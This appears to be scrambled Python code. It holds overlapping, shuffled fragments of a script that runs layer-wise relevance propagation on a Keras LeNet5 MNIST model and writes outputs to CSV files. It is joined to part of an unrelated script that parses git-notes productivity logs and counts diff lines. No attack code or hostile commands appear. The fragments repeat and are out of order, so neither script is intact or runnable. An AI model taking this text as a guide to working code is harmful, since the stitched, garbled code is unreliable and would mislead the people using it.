X_test: ypred = lrpmodel.forward(np.expand_dims(inp, axis=0)) mask", "np import matplotlib as mpl mpl.use('Agg') import matplotlib.pyplot as plt from keras.models import", "load_model, model_from_json from utils import load_MNIST from utils import get_layer_outs_new from utils import", "relfile.close() # plt.clf() # plt.plot(range(10), out_data) # plt.plot(range(10), rel_data) # plt.savefig(\"./plots/plt\"+str(i)+\".png\") ''' for", "= json_file.read() json_file.close() model = model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5') # Compile the model before using", "= open('neural_networks/LeNet5.json', 'r') #Read Keras model parameters (stored in JSON file) file_content =", "R_all = lrpmodel.lrp(Rinit,'alphabeta',3) Rs.append(R_all[-1]) for i in range(len(X_test)): #100 inputs #out_data = []", "# plt.savefig(\"./plots/plt\"+str(i)+\".png\") ''' for i in range(outs[-3].shape[-1]): out_data = [] for j in", "np.zeros_like(ypred) mask[:,np.argmax(ypred)] = 1 Rinit = ypred*mask R_inp, R_all = lrpmodel.lrp(Rinit,'alphabeta',3) Rs.append(R_all[-1]) for", "from utils import load_layerwise_relevances from lrp_toolbox.model_io import read experiment_folder = 'experiments' selected_class =", "lrpmodel.lrp(Rinit,'alphabeta',3) Rs.append(R_all[-1]) for i in range(len(X_test)): #100 inputs #out_data = [] #rel_data =", "'' rel_row = '' for j in range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i]) out_row += str(outs[-3][i][j])", "28, 28 X_test, Y_test = filter_val_set(selected_class, X_test, Y_test) relevant_neurons = load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder, 'LeNet5',", "str(preds[i].argmax(axis=-1)) + '\\n' rel_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' outfile.write(out_row)", "outfile.write(out_row) relfile.write(rel_row) outfile.close() relfile.close() # plt.clf() # plt.plot(range(10), out_data) # plt.plot(range(10), rel_data) #", "using model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) outfile = open('outfile.csv', 'w') relfile = open('relfile.csv', 'w') outs", "in JSON file) file_content = json_file.read() json_file.close() model = model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5') # Compile", "open('relfile.csv', 'w') outs = get_layer_outs_new(model, X_test) preds = model.predict(X_test) lrpmodel = read('neural_networks/LeNet5.txt', 'txt')", "= [] for j in range(10): #100 inputs out_data.append(Rs[j][0][i]) plt.clf() plt.plot(range(10), out_data) plt.savefig(\"./plots/rel\"+str(i)+\".png\")", "plt from keras.models import load_model, model_from_json from utils import load_MNIST from utils import", "import load_layerwise_relevances from lrp_toolbox.model_io import read experiment_folder = 'experiments' selected_class = 0 X_train,", "R_inp, R_all = lrpmodel.lrp(Rinit,'alphabeta',3) Rs.append(R_all[-1]) for i in range(len(X_test)): #100 inputs #out_data =", "= np.zeros_like(ypred) mask[:,np.argmax(ypred)] = 1 Rinit = ypred*mask R_inp, R_all = lrpmodel.lrp(Rinit,'alphabeta',3) Rs.append(R_all[-1])", "from utils import filter_val_set from utils import load_layerwise_relevances from lrp_toolbox.model_io import read experiment_folder", "out_row = '' rel_row = '' for j in range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i]) out_row", "= open('outfile.csv', 'w') relfile = open('relfile.csv', 'w') outs = get_layer_outs_new(model, X_test) preds =", "<gh_stars>0 import numpy as np import matplotlib as mpl mpl.use('Agg') import matplotlib.pyplot as", "layer for analysis Rs = [] for inp in X_test: ypred = lrpmodel.forward(np.expand_dims(inp,", "JSON file) file_content = json_file.read() json_file.close() model = model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5') # Compile the", "+ ',' rel_row += str(Rs[i][0][j]) + ',' out_row += str(Y_test[i].argmax(axis=-1)) + ',' +", "+= str(Rs[i][0][j]) + ',' out_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n'", "#layer print(relevant_neurons) json_file = open('neural_networks/LeNet5.json', 'r') #Read Keras model parameters (stored in JSON", "import matplotlib.pyplot as plt from keras.models import load_model, model_from_json from utils import load_MNIST", "',' + str(preds[i].argmax(axis=-1)) + '\\n' rel_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) +", "str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' outfile.write(out_row) relfile.write(rel_row) outfile.close() relfile.close() # plt.clf()", "import filter_val_set from utils import load_layerwise_relevances from lrp_toolbox.model_io import read experiment_folder = 'experiments'", "+= str(outs[-3][i][j]) + ',' rel_row += str(Rs[i][0][j]) + ',' out_row += str(Y_test[i].argmax(axis=-1)) +", "import numpy as np import matplotlib as mpl mpl.use('Agg') import matplotlib.pyplot as plt", "+ str(preds[i].argmax(axis=-1)) + '\\n' rel_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n'", "json_file.read() json_file.close() model = model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5') # Compile the model before using model.compile(loss='categorical_crossentropy',", "from keras.models import load_model, model_from_json from utils import load_MNIST from utils import get_layer_outs_new", "inp in X_test: ypred = lrpmodel.forward(np.expand_dims(inp, axis=0)) mask = np.zeros_like(ypred) mask[:,np.argmax(ypred)] = 1", "output layer for analysis Rs = [] for inp in X_test: ypred =", "the model before using model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) outfile = open('outfile.csv', 'w') relfile =", "',' out_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' rel_row += str(Y_test[i].argmax(axis=-1))", "'\\n' outfile.write(out_row) relfile.write(rel_row) outfile.close() relfile.close() # plt.clf() # plt.plot(range(10), out_data) # plt.plot(range(10), rel_data)", "= get_layer_outs_new(model, X_test) preds = model.predict(X_test) lrpmodel = read('neural_networks/LeNet5.txt', 'txt') # 99.16% prediction", "'w') relfile = open('relfile.csv', 'w') outs = get_layer_outs_new(model, X_test) preds = model.predict(X_test) lrpmodel", "model before using model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) outfile = open('outfile.csv', 'w') relfile = open('relfile.csv',", "'\\n' rel_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' outfile.write(out_row) relfile.write(rel_row) outfile.close()", "%(experiment_folder, 'LeNet5', 8, #rn selected_class, 7)) #layer print(relevant_neurons) json_file = open('neural_networks/LeNet5.json', 'r') #Read", "lrpmodel.drop_softmax_output_layer() # drop softnax output layer for analysis Rs = [] for inp", "= 0 X_train, Y_train, X_test, Y_test = load_MNIST(channel_first=False) img_rows, img_cols = 28, 28", "[] for j in range(10): #100 inputs out_data.append(Rs[j][0][i]) plt.clf() plt.plot(range(10), out_data) plt.savefig(\"./plots/rel\"+str(i)+\".png\") '''", "'experiments' selected_class = 0 X_train, Y_train, X_test, Y_test = load_MNIST(channel_first=False) img_rows, img_cols =", "read experiment_folder = 'experiments' selected_class = 0 X_train, Y_train, X_test, Y_test = load_MNIST(channel_first=False)", "# 99.16% prediction accuracy lrpmodel.drop_softmax_output_layer() # drop softnax output layer for analysis Rs", "plt.plot(range(10), out_data) # plt.plot(range(10), rel_data) # plt.savefig(\"./plots/plt\"+str(i)+\".png\") ''' for i in range(outs[-3].shape[-1]): out_data", "= 28, 28 X_test, Y_test = filter_val_set(selected_class, X_test, Y_test) relevant_neurons = load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder,", "for i in range(len(X_test)): #100 inputs #out_data = [] #rel_data = [] out_row", "in range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i]) out_row += str(outs[-3][i][j]) + ',' rel_row += str(Rs[i][0][j]) +", "model.load_weights('neural_networks/LeNet5.h5') # Compile the model before using model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) outfile = open('outfile.csv',", "for inp in X_test: ypred = lrpmodel.forward(np.expand_dims(inp, axis=0)) mask = np.zeros_like(ypred) mask[:,np.argmax(ypred)] =", "experiment_folder = 'experiments' selected_class = 0 X_train, Y_train, X_test, Y_test = load_MNIST(channel_first=False) img_rows,", "ypred = lrpmodel.forward(np.expand_dims(inp, axis=0)) mask = np.zeros_like(ypred) mask[:,np.argmax(ypred)] = 1 Rinit = ypred*mask", "= lrpmodel.lrp(Rinit,'alphabeta',3) Rs.append(R_all[-1]) for i in range(len(X_test)): #100 inputs #out_data = [] #rel_data", "mpl mpl.use('Agg') import matplotlib.pyplot as plt from keras.models import load_model, model_from_json from utils", "img_rows, img_cols = 28, 28 X_test, Y_test = filter_val_set(selected_class, X_test, Y_test) relevant_neurons =", "json_file.close() model = model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5') # Compile the model before using model.compile(loss='categorical_crossentropy', optimizer='adam',", "8, #rn selected_class, 7)) #layer print(relevant_neurons) json_file = open('neural_networks/LeNet5.json', 'r') #Read Keras model", "str(Rs[i][0][j]) + ',' out_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' rel_row", "from utils import load_MNIST from utils import get_layer_outs_new from utils import filter_val_set from", "# Compile the model before using model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) outfile = open('outfile.csv', 'w')", "'txt') # 99.16% prediction accuracy lrpmodel.drop_softmax_output_layer() # drop softnax output layer for analysis", "import get_layer_outs_new from utils import filter_val_set from utils import load_layerwise_relevances from lrp_toolbox.model_io import", "as mpl mpl.use('Agg') import matplotlib.pyplot as plt from keras.models import load_model, model_from_json from", "metrics=['accuracy']) outfile = open('outfile.csv', 'w') relfile = open('relfile.csv', 'w') outs = get_layer_outs_new(model, X_test)", "import matplotlib as mpl mpl.use('Agg') import matplotlib.pyplot as plt from keras.models import load_model,", "str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' rel_row += str(Y_test[i].argmax(axis=-1)) + ',' +", "open('outfile.csv', 'w') relfile = open('relfile.csv', 'w') outs = get_layer_outs_new(model, X_test) preds = model.predict(X_test)", "axis=0)) mask = np.zeros_like(ypred) mask[:,np.argmax(ypred)] = 1 Rinit = ypred*mask R_inp, R_all =", "range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i]) out_row += str(outs[-3][i][j]) + ',' rel_row += str(Rs[i][0][j]) + ','", "= [] for inp in X_test: ypred = lrpmodel.forward(np.expand_dims(inp, axis=0)) mask = np.zeros_like(ypred)", "relevant_neurons = load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder, 'LeNet5', 8, #rn selected_class, 7)) #layer print(relevant_neurons) json_file =", "= 'experiments' selected_class = 0 X_train, Y_train, X_test, Y_test = load_MNIST(channel_first=False) img_rows, img_cols", "[] #rel_data = [] out_row = '' rel_row = '' for j in", "str(preds[i].argmax(axis=-1)) + '\\n' outfile.write(out_row) relfile.write(rel_row) outfile.close() relfile.close() # plt.clf() # plt.plot(range(10), out_data) #", "load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder, 'LeNet5', 8, #rn selected_class, 7)) #layer print(relevant_neurons) json_file = open('neural_networks/LeNet5.json', 'r')", "plt.plot(range(10), rel_data) # plt.savefig(\"./plots/plt\"+str(i)+\".png\") ''' for i in range(outs[-3].shape[-1]): out_data = [] for", "in range(outs[-3].shape[-1]): out_data = [] for j in range(10): #100 inputs out_data.append(Rs[j][0][i]) plt.clf()", "#100 inputs #out_data = [] #rel_data = [] out_row = '' rel_row =", "import load_MNIST from utils import get_layer_outs_new from utils import filter_val_set from utils import", "keras.models import load_model, model_from_json from utils import load_MNIST from utils import get_layer_outs_new from", "'r') #Read Keras model parameters (stored in JSON file) file_content = json_file.read() json_file.close()", "ypred*mask R_inp, R_all = lrpmodel.lrp(Rinit,'alphabeta',3) Rs.append(R_all[-1]) for i in range(len(X_test)): #100 inputs #out_data", "= [] out_row = '' rel_row = '' for j in range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i])", "for i in range(outs[-3].shape[-1]): out_data = [] for j in range(10): #100 inputs", "get_layer_outs_new from utils import filter_val_set from utils import load_layerwise_relevances from lrp_toolbox.model_io import read", "load_MNIST(channel_first=False) img_rows, img_cols = 28, 28 X_test, Y_test = filter_val_set(selected_class, X_test, Y_test) relevant_neurons", "as np import matplotlib as mpl mpl.use('Agg') import matplotlib.pyplot as plt from keras.models", "#Read Keras model parameters (stored in JSON file) file_content = json_file.read() json_file.close() model", "= [] #rel_data = [] out_row = '' rel_row = '' for j", "= '' rel_row = '' for j in range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i]) out_row +=", "+= str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' rel_row += str(Y_test[i].argmax(axis=-1)) + ','", "utils import load_layerwise_relevances from lrp_toolbox.model_io import read experiment_folder = 'experiments' selected_class = 0", "X_test, Y_test) relevant_neurons = load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder, 'LeNet5', 8, #rn selected_class, 7)) #layer print(relevant_neurons)", "= model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5') # Compile the model before using model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) outfile", "out_data) # plt.plot(range(10), rel_data) # plt.savefig(\"./plots/plt\"+str(i)+\".png\") ''' for i in range(outs[-3].shape[-1]): out_data =", "= filter_val_set(selected_class, X_test, Y_test) relevant_neurons = load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder, 'LeNet5', 8, #rn selected_class, 7))", "filter_val_set(selected_class, X_test, Y_test) relevant_neurons = load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder, 'LeNet5', 8, #rn selected_class, 7)) #layer", "out_data = [] for j in range(10): #100 inputs out_data.append(Rs[j][0][i]) plt.clf() plt.plot(range(10), out_data)", "for j in range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i]) out_row += str(outs[-3][i][j]) + ',' rel_row +=", "softnax output layer for analysis Rs = [] for inp in X_test: ypred", "= ypred*mask R_inp, R_all = lrpmodel.lrp(Rinit,'alphabeta',3) Rs.append(R_all[-1]) for i in range(len(X_test)): #100 inputs", "1 Rinit = ypred*mask R_inp, R_all = lrpmodel.lrp(Rinit,'alphabeta',3) Rs.append(R_all[-1]) for i in range(len(X_test)):", "in range(len(X_test)): #100 inputs #out_data = [] #rel_data = [] out_row = ''", "= load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder, 'LeNet5', 8, #rn selected_class, 7)) #layer print(relevant_neurons) json_file = open('neural_networks/LeNet5.json',", "model = model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5') # Compile the model before using model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])", "'' for j in range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i]) out_row += str(outs[-3][i][j]) + ',' rel_row", "X_train, Y_train, X_test, Y_test = load_MNIST(channel_first=False) img_rows, img_cols = 28, 28 X_test, Y_test", "7)) #layer print(relevant_neurons) json_file = open('neural_networks/LeNet5.json', 'r') #Read Keras model parameters (stored in", "utils import filter_val_set from utils import load_layerwise_relevances from lrp_toolbox.model_io import read experiment_folder =", "in X_test: ypred = lrpmodel.forward(np.expand_dims(inp, axis=0)) mask = np.zeros_like(ypred) mask[:,np.argmax(ypred)] = 1 Rinit", "99.16% prediction accuracy lrpmodel.drop_softmax_output_layer() # drop softnax output layer for analysis Rs =", "str(outs[-3][i][j]) + ',' rel_row += str(Rs[i][0][j]) + ',' out_row += str(Y_test[i].argmax(axis=-1)) + ','", "lrpmodel = read('neural_networks/LeNet5.txt', 'txt') # 99.16% prediction accuracy lrpmodel.drop_softmax_output_layer() # drop softnax output", "= lrpmodel.forward(np.expand_dims(inp, axis=0)) mask = np.zeros_like(ypred) mask[:,np.argmax(ypred)] = 1 Rinit = ypred*mask R_inp,", "= '' for j in range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i]) out_row += str(outs[-3][i][j]) + ','", "inputs #out_data = [] #rel_data = [] out_row = '' rel_row = ''", "numpy as np import matplotlib as mpl mpl.use('Agg') import matplotlib.pyplot as plt from", "#rel_data = [] out_row = '' rel_row = '' for j in range(outs[-3].shape[-1]):", "',' rel_row += str(Rs[i][0][j]) + ',' out_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1))", "rel_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' outfile.write(out_row) relfile.write(rel_row) outfile.close() relfile.close()", "# plt.plot(range(10), out_data) # plt.plot(range(10), rel_data) # plt.savefig(\"./plots/plt\"+str(i)+\".png\") ''' for i in range(outs[-3].shape[-1]):", "range(len(X_test)): #100 inputs #out_data = [] #rel_data = [] out_row = '' rel_row", "+ ',' out_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' rel_row +=", "outfile.close() relfile.close() # plt.clf() # plt.plot(range(10), out_data) # plt.plot(range(10), rel_data) # plt.savefig(\"./plots/plt\"+str(i)+\".png\") '''", "+= str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' outfile.write(out_row) relfile.write(rel_row) outfile.close() relfile.close() #", "plt.savefig(\"./plots/plt\"+str(i)+\".png\") ''' for i in range(outs[-3].shape[-1]): out_data = [] for j in range(10):", "model parameters (stored in JSON file) file_content = json_file.read() json_file.close() model = model_from_json(file_content)", "= open('relfile.csv', 'w') outs = get_layer_outs_new(model, X_test) preds = model.predict(X_test) lrpmodel = read('neural_networks/LeNet5.txt',", "matplotlib as mpl mpl.use('Agg') import matplotlib.pyplot as plt from keras.models import load_model, model_from_json", "file_content = json_file.read() json_file.close() model = model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5') # Compile the model before", "[] for inp in X_test: ypred = lrpmodel.forward(np.expand_dims(inp, axis=0)) mask = np.zeros_like(ypred) mask[:,np.argmax(ypred)]", "j in range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i]) out_row += str(outs[-3][i][j]) + ',' rel_row += str(Rs[i][0][j])", "plt.clf() # plt.plot(range(10), out_data) # plt.plot(range(10), rel_data) # plt.savefig(\"./plots/plt\"+str(i)+\".png\") ''' for i in", "open('neural_networks/LeNet5.json', 'r') #Read Keras model parameters (stored in JSON file) file_content = json_file.read()", "matplotlib.pyplot as plt from keras.models import load_model, model_from_json from utils import load_MNIST from", "#rel_data.append(Rs[j][0][i]) out_row += str(outs[-3][i][j]) + ',' rel_row += str(Rs[i][0][j]) + ',' out_row +=", "from utils import get_layer_outs_new from utils import filter_val_set from utils import load_layerwise_relevances from", "+ '\\n' outfile.write(out_row) relfile.write(rel_row) outfile.close() relfile.close() # plt.clf() # plt.plot(range(10), out_data) # plt.plot(range(10),", "28 X_test, Y_test = filter_val_set(selected_class, X_test, Y_test) relevant_neurons = load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder, 'LeNet5', 8,", "mpl.use('Agg') import matplotlib.pyplot as plt from keras.models import load_model, model_from_json from utils import", "Y_train, X_test, Y_test = load_MNIST(channel_first=False) img_rows, img_cols = 28, 28 X_test, Y_test =", "#rn selected_class, 7)) #layer print(relevant_neurons) json_file = open('neural_networks/LeNet5.json', 'r') #Read Keras model parameters", "import read experiment_folder = 'experiments' selected_class = 0 X_train, Y_train, X_test, Y_test =", "Rs = [] for inp in X_test: ypred = lrpmodel.forward(np.expand_dims(inp, axis=0)) mask =", "mask[:,np.argmax(ypred)] = 1 Rinit = ypred*mask R_inp, R_all = lrpmodel.lrp(Rinit,'alphabeta',3) Rs.append(R_all[-1]) for i", "'w') outs = get_layer_outs_new(model, X_test) preds = model.predict(X_test) lrpmodel = read('neural_networks/LeNet5.txt', 'txt') #", "relfile.write(rel_row) outfile.close() relfile.close() # plt.clf() # plt.plot(range(10), out_data) # plt.plot(range(10), rel_data) # plt.savefig(\"./plots/plt\"+str(i)+\".png\")", "for analysis Rs = [] for inp in X_test: ypred = lrpmodel.forward(np.expand_dims(inp, axis=0))", "model.predict(X_test) lrpmodel = read('neural_networks/LeNet5.txt', 'txt') # 99.16% prediction accuracy lrpmodel.drop_softmax_output_layer() # drop softnax", "load_MNIST from utils import get_layer_outs_new from utils import filter_val_set from utils import load_layerwise_relevances", "outs = get_layer_outs_new(model, X_test) preds = model.predict(X_test) lrpmodel = read('neural_networks/LeNet5.txt', 'txt') # 99.16%", "filter_val_set from utils import load_layerwise_relevances from lrp_toolbox.model_io import read experiment_folder = 'experiments' selected_class", "relfile = open('relfile.csv', 'w') outs = get_layer_outs_new(model, X_test) preds = model.predict(X_test) lrpmodel =", "model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5') # Compile the model before using model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) outfile =", "get_layer_outs_new(model, X_test) preds = model.predict(X_test) lrpmodel = read('neural_networks/LeNet5.txt', 'txt') # 99.16% prediction accuracy", "preds = model.predict(X_test) lrpmodel = read('neural_networks/LeNet5.txt', 'txt') # 99.16% prediction accuracy lrpmodel.drop_softmax_output_layer() #", "= model.predict(X_test) lrpmodel = read('neural_networks/LeNet5.txt', 'txt') # 99.16% prediction accuracy lrpmodel.drop_softmax_output_layer() # drop", "parameters (stored in JSON file) file_content = json_file.read() json_file.close() model = model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5')", "drop softnax output layer for analysis Rs = [] for inp in X_test:", "+ str(preds[i].argmax(axis=-1)) + '\\n' outfile.write(out_row) relfile.write(rel_row) outfile.close() relfile.close() # plt.clf() # plt.plot(range(10), out_data)", "'LeNet5', 8, #rn selected_class, 7)) #layer print(relevant_neurons) json_file = open('neural_networks/LeNet5.json', 'r') #Read Keras", "+ '\\n' rel_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' outfile.write(out_row) relfile.write(rel_row)", "lrp_toolbox.model_io import read experiment_folder = 'experiments' selected_class = 0 X_train, Y_train, X_test, Y_test", "(stored in JSON file) file_content = json_file.read() json_file.close() model = model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5') #", "rel_data) # plt.savefig(\"./plots/plt\"+str(i)+\".png\") ''' for i in range(outs[-3].shape[-1]): out_data = [] for j", "#out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i]) out_row += str(outs[-3][i][j]) + ',' rel_row += str(Rs[i][0][j]) + ',' out_row", "json_file = open('neural_networks/LeNet5.json', 'r') #Read Keras model parameters (stored in JSON file) file_content", "X_test, Y_test = filter_val_set(selected_class, X_test, Y_test) relevant_neurons = load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder, 'LeNet5', 8, #rn", "Y_test = filter_val_set(selected_class, X_test, Y_test) relevant_neurons = load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder, 'LeNet5', 8, #rn selected_class,", "= read('neural_networks/LeNet5.txt', 'txt') # 99.16% prediction accuracy lrpmodel.drop_softmax_output_layer() # drop softnax output layer", "# plt.clf() # plt.plot(range(10), out_data) # plt.plot(range(10), rel_data) # plt.savefig(\"./plots/plt\"+str(i)+\".png\") ''' for i", "selected_class = 0 X_train, Y_train, X_test, Y_test = load_MNIST(channel_first=False) img_rows, img_cols = 28,", "utils import get_layer_outs_new from utils import filter_val_set from utils import load_layerwise_relevances from lrp_toolbox.model_io", "= 1 Rinit = ypred*mask R_inp, R_all = lrpmodel.lrp(Rinit,'alphabeta',3) Rs.append(R_all[-1]) for i in", "img_cols = 28, 28 X_test, Y_test = filter_val_set(selected_class, X_test, Y_test) relevant_neurons = load_layerwise_relevances('%s/%s_%d_%d_%d'", "Y_test = load_MNIST(channel_first=False) img_rows, img_cols = 28, 28 X_test, Y_test = filter_val_set(selected_class, X_test,", "+ ',' + str(preds[i].argmax(axis=-1)) + '\\n' outfile.write(out_row) relfile.write(rel_row) outfile.close() relfile.close() # plt.clf() #", "mask = np.zeros_like(ypred) mask[:,np.argmax(ypred)] = 1 Rinit = ypred*mask R_inp, R_all = lrpmodel.lrp(Rinit,'alphabeta',3)", "Keras model parameters (stored in JSON file) file_content = json_file.read() json_file.close() model =", "import load_model, model_from_json from utils import load_MNIST from utils import get_layer_outs_new from utils" ]
[ "os.path.isdir(os.path.join(args.repo_dir, \".git\"))): print \"Cannot find %s directory. Not a git repo.\" % os.path.join(args.repo_dir,", "in category: break else: time_categories['refactoring'] = {u'time_spent': 0.0, u'difficulty': 0} #pp.pprint(log) total_time =", "= pprint.PrettyPrinter(indent=4) #pp.pprint(log_list) lines_per_commit = [] total_time_per_commit = [] for log in log_list:", "for line in diff.split('\\n'): if not (line.startswith(\"-\") or line.startswith(\"+\")): continue if line.strip() ==", "{u'time_spent': 0.0, u'difficulty': 0} #pp.pprint(log) total_time = (time_categories['planning']['time_spent'] + time_categories['coding']['time_spent'] + time_categories['refactoring']['time_spent'] +", "commit in commits: try: logs.append([commit.hexsha, subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), \"notes\", \"--ref\", PRODUCTIVITY_NOTES_NAMESPACE, \"show\",", "+ time_categories['debugging']['time_spent'] + time_categories['optimising']['time_spent']) total_time_per_commit.append(total_time) commit = git.Commit(repo, binascii.unhexlify(log[0])) lines_changed = 0 print", "show # git notes --ref refs/notes/productivity show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs = [] for commit", "as notes\") args = parser.parse_args() if(not os.path.isdir(os.path.join(args.repo_dir, \".git\"))): print \"Cannot find %s directory.", "parser = argparse.ArgumentParser() parser.add_argument(\"repo_dir\", help=\"The repo that contains the productivity logs as notes\")", "parser.parse_args() if(not os.path.isdir(os.path.join(args.repo_dir, \".git\"))): print \"Cannot find %s directory. Not a git repo.\"", "pprint pp = pprint.PrettyPrinter(indent=4) #pp.pprint(log_list) lines_per_commit = [] total_time_per_commit = [] for log", "in time_categories: if 'refectoring' in category: break else: time_categories['refactoring'] = {u'time_spent': 0.0, u'difficulty':", "[] for hexsha, log in logs: try: for sublog in parse_sublogs(log): log_list.append([hexsha, sublog])", "python2 from test_json import test_json from cleansing import parse_sublogs, build_graph import os.path import", "hexsha, log in logs: try: for sublog in parse_sublogs(log): log_list.append([hexsha, sublog]) except: print(hexsha)", "import re import pprint import git import matplotlib import binascii parser = argparse.ArgumentParser()", "or line.strip() == \"-\": continue if line.startswith('+++') or line.startswith('---'): continue sloc += 1", "if(not os.path.isdir(os.path.join(args.repo_dir, \".git\"))): print \"Cannot find %s directory. Not a git repo.\" %", "import parse_sublogs, build_graph import os.path import subprocess import sys import json import argparse", "len(user_responses) == 1: continue time_categories = report['user_responses']['time_categories'] #nasa_tlx = report['NASA-TLX'] for category in", "= git.Commit(repo, binascii.unhexlify(log[0])) lines_changed = 0 print commit.diff(commit.parents[0])[0].diff diff = subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir,", "diff = subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), 'diff', commit.hexsha, commit.parents[0].hexsha]) sloc = 0 for", "commit.parents[0].hexsha]) sloc = 0 for line in diff.split('\\n'): if not (line.startswith(\"-\") or line.startswith(\"+\")):", "a git repo.\" % os.path.join(args.repo_dir, \".git\") sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo = Repo(args.repo_dir) #commits =", "commits = list(build_graph(repo).nodes) #git notes --ref refs/notes/productivity show # git notes --ref refs/notes/productivity", "argparse.ArgumentParser() parser.add_argument(\"repo_dir\", help=\"The repo that contains the productivity logs as notes\") args =", "print(hexsha) import pprint pp = pprint.PrettyPrinter(indent=4) #pp.pprint(log_list) lines_per_commit = [] total_time_per_commit = []", "not (line.startswith(\"-\") or line.startswith(\"+\")): continue if line.strip() == \"+\" or line.strip() == \"-\":", "git notes --ref refs/notes/productivity show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs = [] for commit in commits:", "else: time_categories['refactoring'] = {u'time_spent': 0.0, u'difficulty': 0} #pp.pprint(log) total_time = (time_categories['planning']['time_spent'] + time_categories['coding']['time_spent']", "= report['user_responses']['time_categories'] #nasa_tlx = report['NASA-TLX'] for category in time_categories: if 'refectoring' in category:", "parse_sublogs, build_graph import os.path import subprocess import sys import json import argparse from", "contains the productivity logs as notes\") args = parser.parse_args() if(not os.path.isdir(os.path.join(args.repo_dir, \".git\"))): print", "'user_responses' in report: continue if len(report) == 0: continue user_responses = report['user_responses'] if", "Not a git repo.\" % os.path.join(args.repo_dir, \".git\") sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo = Repo(args.repo_dir) #commits", "#pp.pprint(log) total_time = (time_categories['planning']['time_spent'] + time_categories['coding']['time_spent'] + time_categories['refactoring']['time_spent'] + time_categories['debugging']['time_spent'] + time_categories['optimising']['time_spent']) total_time_per_commit.append(total_time)", "+ time_categories['refactoring']['time_spent'] + time_categories['debugging']['time_spent'] + time_categories['optimising']['time_spent']) total_time_per_commit.append(total_time) commit = git.Commit(repo, binascii.unhexlify(log[0])) lines_changed =", "in log_list: report = log[1]['log'] if not 'user_responses' in report: continue if len(report)", "\"--git-dir\", os.path.join(args.repo_dir, \".git\"), \"notes\", \"--ref\", PRODUCTIVITY_NOTES_NAMESPACE, \"show\", commit.hexsha])]) except: pass log_list = []", 